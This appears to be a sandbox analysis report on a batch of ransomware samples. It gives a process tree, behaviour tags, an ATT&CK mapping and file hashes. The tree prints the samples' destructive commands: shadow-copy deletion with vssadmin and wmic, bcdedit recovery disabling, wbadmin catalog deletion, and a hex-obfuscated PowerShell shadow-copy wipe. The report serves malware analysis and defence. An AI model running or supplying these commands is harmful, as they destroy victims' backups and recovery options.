C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exeHEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3088 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet4⤵PID:6696
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:6872
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:2184
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:5540
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:3656
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
PID:7444
-
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exeTrojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer start page
- Suspicious use of SetWindowsHookEx
PID:1264
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exeTrojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4996
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exeTrojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exeTrojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exeTrojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5296
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exeTrojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5520
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exeTrojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\server.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:5896 -
C:\Users\Admin\AppData\Local\Temp\CyberPunk2077.sfx.exeCyberPunk2077.sfx.exe -p1234 -dC:\Users\Admin\AppData\Local\Temp5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5472 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1324 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\CyberPunk2077.exe"7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5800
-
-
-
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exeTrojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5908 -
C:\Windows\SysWOW64\svchost.exe"C:\Windows\SysWOW64\svchost.exe"4⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:4292 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 7205⤵
- Program crash
PID:5744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 7285⤵
- Program crash
PID:5608
-
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exeTrojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5892 -
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exeTrojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe4⤵
- Executes dropped EXE
PID:6128
-
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exeTrojan-Ransom.Win32.Foreign.olkm-9595601c79e5083741e6d95a280426dafdff157af2f8693f05254520ba1d5036.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6072
-
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exeTrojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6876 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6876 -s 4724⤵
- Program crash
PID:6920
-
-
-
C:\Users\Admin\Desktop\00403\UDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exeUDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6448 -
C:\Users\Admin\AppData\Local\Temp\497D8E.exeC:\Users\Admin\AppData\Local\Temp\497D8E.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6948
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3448 -ip 34481⤵PID:1192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4292 -ip 42921⤵PID:276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6876 -ip 68761⤵PID:256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4292 -ip 42921⤵PID:6652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1824 -ip 18241⤵PID:6096
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\readme.txt1⤵
- Opens file in notepad (likely ransom note)
PID:1008
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6524
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.d96d1f6d.TXT1⤵
- Opens file in notepad (likely ransom note)
PID:5664
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:3592
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1160
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:7264
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:7356 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\Readme.README2⤵
- Opens file in notepad (likely ransom note)
PID:5084
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x41c 0x3f81⤵PID:6148
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:6552
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
3File Deletion
3Modify Registry
4Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
209KB
MD5d233eef438a2a99e1438fba6e6461043
SHA1d9cc485124a1fbb8c5cad3a096b2113d3780baf3
SHA256ada7349b9242d8c1ec6cc7f4d7c8b17d6a2d9d6c1bb160bd3998ededa3900251
SHA512dd496880361c9c68e770c09285f7b60e938a32f10d4bb03536169690623b2b657ae43fc9219982d50d5bb856ca66636380b98375101502b41c825ab18d533bba
-
Filesize
1KB
MD565b045a29c11fd41c72a74a784081bdc
SHA120d7079bc7c6262f3b4a56220e30285101c1fc5d
SHA2562ecc0df9b581b25f9072d51160a6c4b983dc88de1da5e752cc5266ee26cacf42
SHA512d6f7ce54e86636adb1e2fd6904732709762a043318bc9d3c32341d629c408a630741916008a01596636d2ab3d2115859483ec92e957693e28fc281f76f0e5bfe
-
Filesize
1KB
MD558ffaabd4f02822cf0d7a36b6f7cf663
SHA138c18f4c095442890df757f95f7a37ec4b49b055
SHA2569f7d47d0a58eb2d21610091ecd6a7df85d67f9d1600d889407b19a7610b74f62
SHA51271f0ee6c292f07247110f1014c489ecf24d14ea353442b26f4a14752a606350fe6c6939bb0b902a88b8728d077efe07f52a08d23a518ff95d8099f954f6e5d5f
-
Filesize
2KB
MD525d0b19a0ec34a39dfa3e177866f01a3
SHA1a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198
-
Filesize
153B
MD59542b61a1b1a67deb6f5608395efd465
SHA174158ed4ee52a7001a9831f80cd3ef60c081679a
SHA2562fb0e6d5f7bab7d4446b8701d608cdec83cbada4f7d7e8c6ab43f5915a42742c
SHA512e2c1cbb8b8176257296593a5b72ddc22d6009f0e4c7c8c2ecce2faa234f0882e7b4d001c834a6d5846cced03fdc57da16294a5e6f73b8541cce9c805d204e41d
-
Filesize
78B
MD5c578d9653b22800c3eb6b6a51219bbb8
SHA1a97aa251901bbe179a48dbc7a0c1872e163b1f2d
SHA25620a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2
SHA5123ae6dc8f02d1a78e1235a0782b632972da5a74ab32287cc41aa672d4fa4a9d34bb5fc50eba07b6915f2e61c402927cd5f6feeb7f7602afa2f64e91efb3b7fc4d
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
212KB
MD52f2e7ef471eb0c5785552b4e4476eddc
SHA1bbeea16734e19f3fd081391612af51112f107d13
SHA25663764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be
SHA512d5414eb8b3ee49a00c9db617e20e16bb3058e449a1538df5e0ad61c5a935a95e9f25d52f93b79b5e783b5c404f9164de859ac76690ec00f50696fcb2a54b1221
-
Filesize
9.9MB
MD5f65b6e5c80643e85771e1b050cce51f3
SHA1e9d6ec45859868fda152fd19a0c977a439be40fa
SHA2567e946b53dd48fc7d42a8812ab0450e1193ae21ee9990d812811224c3429ecfc5
SHA51263d3fb8b157c30fc155feedf01ba7f141e7251d9a424e056b8f6798ee1238dc6c5834938940c3fd445ed9c22a53841f389f3d553c6b53e52285030751e120c53
-
Filesize
9.9MB
MD59bb3e77f3a2b7329ca41979a783996ae
SHA1fb4d3e1fe06bab2bb9255f18b1e8e079fbf6de06
SHA25608124c7d2c97ffd108f1b7c9bba86aaeff5a41d16c77fcf11b3a8c9504f93424
SHA512d1c4567034e479956c43660c4553d8aff2242dae7c414900747cdb0d59ace891bdf5774474e8509a8c33291dbf13561bfadd4758d77d2f60ae8e9cb262a08bf1
-
Filesize
81KB
MD5aeab74db6bc6c914997f1a8a9ff013ec
SHA16b717f23227d158d6aa566498c438b8f305a29b5
SHA25618ccb2dd8af853f4e6221bb5513e3154ef67ae61cee6ec319a8a97615987dc4b
SHA512a2832b7720599361e2537f79a2597acb1a2d5633fdfe20a0d1075e9457683fdb1d5676d121c0bf1a825ff99512dcd924254f1151b50aae922acc0cc10f461036
-
Filesize
71KB
MD52bb3496c855e5f9f14005e36525f9ed7
SHA1a09598372eb8b825e762fc7c18b75c8ad6a70568
SHA256b4995be5f03dce5bf0443bfae4cf8cb2ec5b16ae3bb078333123927323aa0dca
SHA512d06d83683524c082886fe3fa5269ea1c9ec0c61d6835a9dde2b91d6bcbb02fa2bf0c2936c1f3c99a3ba741d7c688c1c3727b8a2a6fef03d8d5c00c3b448f2a68
-
Filesize
143KB
MD5ea3d64b8cebcbcc84e230733824d83ee
SHA1e59e4e9353b8d282e022ac0f5ecfaabdb6b91d24
SHA2561baaaede2f7324b31f67f3d3ec98982c75a5438a1e83a5ddb6dd14d9fcf8e768
SHA51203d08fd9b66eced2668b6fc83b1c7778b6689a504ccb93ec912935303595035138bf30aec95cada8b502833234c60f52fb65487843717e6d231fcc04217dbe82
-
Filesize
104KB
MD517bce334e63161d93954596cab85ce93
SHA1d9be6bf1b9b6415b12810ae3cdaac381746aac7a
SHA25672187b58b87abab33c760fed3e1d295b8c6786e80490125cee138b424bc71e37
SHA51298a915bbe67b6d5ce48f3d15135724a52d456ff1a0713da7b8febc24be7ea466e3405fec032212b1353e9675f2d044a7f13e514a5e4a1d82fa4905d7a2e7f262
-
Filesize
1.1MB
MD5c9f92d933589fe85deffb89ce3d08052
SHA1f9349a85d4097cdd3c011c8b267921af3c9c6552
SHA256a49b409b3ba4c6bce74fc5bf31ba53ba080b1a33cb83c92e5354b9164d030ea6
SHA51287668439aa812f0a8672805039bf6667a1fa221435a1f5bf6c82fd66deeeb7d3ec2d33a04a45311cb50d59131f98c54d3624ed2cd5f269da69c62706808283e3
-
Filesize
180KB
MD5d8ed156b7acacba7ae93f64cd3a6c488
SHA1368ca96eb8d569b8f3cb70e4bbf6a427902fea32
SHA256c68164809b0c27c93ebd87cbbb5f422463554cbc15b2b24ed86967947b11bf16
SHA512107e66d42455e395fcdd032f0e5a2c555cd7cc435d5b3bc8fc213f02f3aab30f79b361e0df0b46b41d337249ef84a1b8ec3e3cfbce522ce00b1907d909447f97
-
Filesize
61KB
MD5070df20954306ae7c97b8a04390fdf47
SHA1064bc619ba2985f913d6ccb871286fcfad5e61cd
SHA25693cc376d376b374585d417a499d2ab8026a8b5bafa58632c2e1e09cdc4063461
SHA51213273dc5067511a46f8b6ac4124a10e6f816420f6fbf231ef09c2557b76443a7e0489182c6ddc29bb6fdb482719cbcb9b4f592f3b135bb1d955caf16a9402484
-
Filesize
1.5MB
MD572802b72dd0d697f1fedb7d8a1e6cef3
SHA16df67366b8efa36e738b26a58ecd4168b09bcd16
SHA2561d15049774b483f8b063aea48e95a66d2dfd4dbdf376b1fa971fc8646605857d
SHA5129f2d4fa88a46895e4ff9e50e815ed0ab652c900b3a7f50e76ccf7d43b484c58dbc635d8be0fe2138c9e9965a672dfad8aa1481f1191a4c6cdce2cda0f1b74ce8
-
Filesize
761KB
MD55ca73655bc3c1ddfa091c03ab6626b1d
SHA123aa306f7a06321f75e58bcd5f45361b6be9d6c8
SHA256f3764218a7843bbda56c7df7cc2ee9462898f67e8bc97e498d4851e2f58ab977
SHA512dc10b38b7117992e4db0116cdfed33b492ae5f6665d038524e2ce95609efb5b69a1230c62e43b2dfad26cfaf982e4772ed5470794c1764d25ade1219e8c65744
-
Filesize
2.2MB
MD548aea2ba1df0ead97735a2907308ebe4
SHA118a06b41e94241ac686c8cd583c7b58cd743416f
SHA2563d21f3fd38219ba59a9793662d843219fc708e0cff619b3a4063cf8b4b4662de
SHA512b65d520f5652f639db555f99aa324c7a172172861e05f3e85563a56f10b4ab1094155e6e3580ff08254a885b8a434c7c53452402db47bd2731d9a17cd324c76b
-
Filesize
10KB
MD5ce6bdab775a6469b676462fca5195cb8
SHA1e373b3189d9d4231f961a0865d774217d9c4a1bc
SHA256554e30c9fb50dcb48cb68064662c30e2fe8b48f9e4aad77e7c4f335ce3825f19
SHA512d0262f2831e36583e609eefdb410a416df61aa8c8ee884326b418455d737a8ccc7745f8aa8c181e981e554f845daaff462cba3a94593ef31b83edb0c4509b254
-
Filesize
57KB
MD5bac7dd23125b09f2909c25eb23e1f811
SHA12ef9a1f3d10399864c2ef63030ada29b8059c6f6
SHA2568fad4082b691a9ef4191519175d1000fa44341e59a1a9db01f3df4ca3ede42c3
SHA51295b6930a2add69c9f2b266680392b4948e7d04059074466f1fcd556a0cf09f464163cb5720409b80745e303c469c72edbd8b6036721f29b5601ed20d82b77688
-
Filesize
3.3MB
MD5c5b23d73fd8e234125e271cf00090a14
SHA1686963d9b782bf7ad60651668a1d93eeb09b79d1
SHA2568b0ffa63d874192350552d99392785e14faf36e2e4c91db0830eeb3d8197c2f2
SHA512f4847f02c742ad7e76098530ddfd21666695ce6be48e77ddee799e8f6b7a04079896f450ba78ab4926e629c1d32d38242a203ebfdbc90c096773d5153f86e9f6
-
Filesize
110KB
MD56b3210f989d523d133cda1ff8f9ff286
SHA1ab642dfe42597d1fdebcf0a93589502faa3ae600
SHA25637b7eb8e8895eca62c3eedb3ba4ef381f5f51aed894e1651a78186c39c5db191
SHA51280272375aace4b00acec3c7279683725351f0b0a54bee54e6d265bcd13cbdf52c6561236b386dbde81e882f1723dfaad7f3d8c6546abcf7a54d95b4e8ffbc69b
-
Filesize
22KB
MD53e3b975dd01db8c4e1804e07656ed0f2
SHA1f4f33520f9a9f084337a98672853587351726dfb
SHA25697e0aa3d061f47faad6e8818cc4377d972edbeecd20791fd1de9786988224b11
SHA512780fc536001d365681ca68229aac09a5eb8a7c0263641ad906222ed3306f359d0c1e5cc26d9a9373b9e7b925108292ce4c426f8442da0006333bb34dc9ebd343
-
Filesize
170KB
MD530865748c2848ec07115835a553b968c
SHA195c8fd6b2f685219670d2c85440fbbab9d6085ae
SHA256220c04a51892082d70f2b7635f10a81b1a2d59fd22fbb0973b67bde193bb81b0
SHA512beb6cdbf46bb117ad59cba42da89d011cd24962eeb93bb1f8359e255ee70657c26798358c97fa38fc434a8fbd3f691635a17a13e3ddce2b57b5b280be447834d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
24KB
MD5640bff73a5f8e37b202d911e4749b2e9
SHA19588dd7561ab7de3bca392b084bec91f3521c879
SHA256c1e568e25ec111184deb1b87cfda4bfec529b1abeab39b66539d998012f33502
SHA51239c6c358e2b480c8cbebcc1da683924c8092fb2947f2da4a8df1b0dc1fdda61003d91d12232a436ec88ff4e0995b7f6ee8c6efbdca935eaa984001f7a72fea0a
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe
Filesize19.7MB
MD5389be2d6eaa3936e971c41bb2cf418d9
SHA11035eb142fd54b1616edd266de6df02aedbbc8cc
SHA25686321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8
SHA512573662105f6e04906024aa79418f578ce6715126a9347344917c094e7588c15a32e51fd2f319897d72a30272f04d0d5c3222061debedd2203d6c7cc012d90688
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe
Filesize1.3MB
MD5227f717e5c9da15f1f50d4fc4d6ec89f
SHA17462f5f72cf37a162694545a5c619c8fd46ee35a
SHA2566e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5
SHA51205166162ccc55e4d757e00ed9f27c0de5a3fbdfb0eaa8fe532c8517c74923d301399f91c21bd4b4f5a2c192bc7ac8bf4c0a19753463194acb1b01105f0987639
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
Filesize3.9MB
MD54c39c19ba724b4cbd95fb99059b002af
SHA148611238def49b0e86de0ce4ba7c1bff7ab1e0ac
SHA25602a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795
SHA512e7307f674d5699cc022ad528e1b417a52bf270fc4a2a92fb263faec7a9efb769ff3f32b861253ce5bfdb71d5cfcd280cd865392cb3639a29fde9d4eefc71c591
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
Filesize190KB
MD56da5a1163c3c8264134b3366521ef78a
SHA18dc13c56d1998ab44176361fb8f9389eca75f415
SHA2565cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251
SHA5125ead53b33ac55e2e14d64c14d6009d96dd62e468ad20270ca6b44658f557b91778b6a52a6124a9133d8d25a4d8155666f935c1c88b4650f3fd6738d0da4e7818
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe
Filesize97KB
MD5b526084ac9ecb0e2071e178e7c642e29
SHA1feec210f08423776ea4cd3ef07da9c1841f337b9
SHA25620371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043
SHA51249ad8917cb1355027091d294fba08ecfdcd55f5cb71ee6257c4a05cd8ab0abe42402acb3c9a17fae8a6d47db56f49911010482c39f8dbd949550b0d3b9056d26
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe
Filesize322KB
MD504cf403611bb7732bbf874a2ad70b799
SHA1a514f5eb0498497ce2415d591f3ed12e43567e6f
SHA256e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c
SHA5122272750b5d8bcc36dc083eedb853d9f28dd361983264f471325488c5075370935a2e23adc859db74ee737af86c36c65ea49eebd80c51e119fdb2794cef97852b
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
Filesize504KB
MD5e9454a2ff16897e177d8a11083850ec7
SHA16b6855931e69d27f5f2e2d828fbeb4db91688996
SHA256e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead
SHA5129bd01ed32887cecefe3987991f3ae3a0375c1cb1bff8b49f795b000076c26a1bb938476e4383b60a3f1ac5de79f7cd3cf2520ef695908815c0fee55a17dcb021
-
C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
Filesize356KB
MD57f5d465cca054e46bf406d73b60bb2b6
SHA1ab74205e9f53e47098a5a2165d3e92804fd5c6d0
SHA256898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05
SHA5121cb2a266268076e5be028c1536632d11b146cf3e757859d8a9325ef5ac18fe2fdf383968b745a9757f7b32dd41888d7a8e536d23d9dc689bf5e71d3b99eb6961
-
C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
Filesize1.5MB
MD5a96f370194c664573a6194cff2bffb48
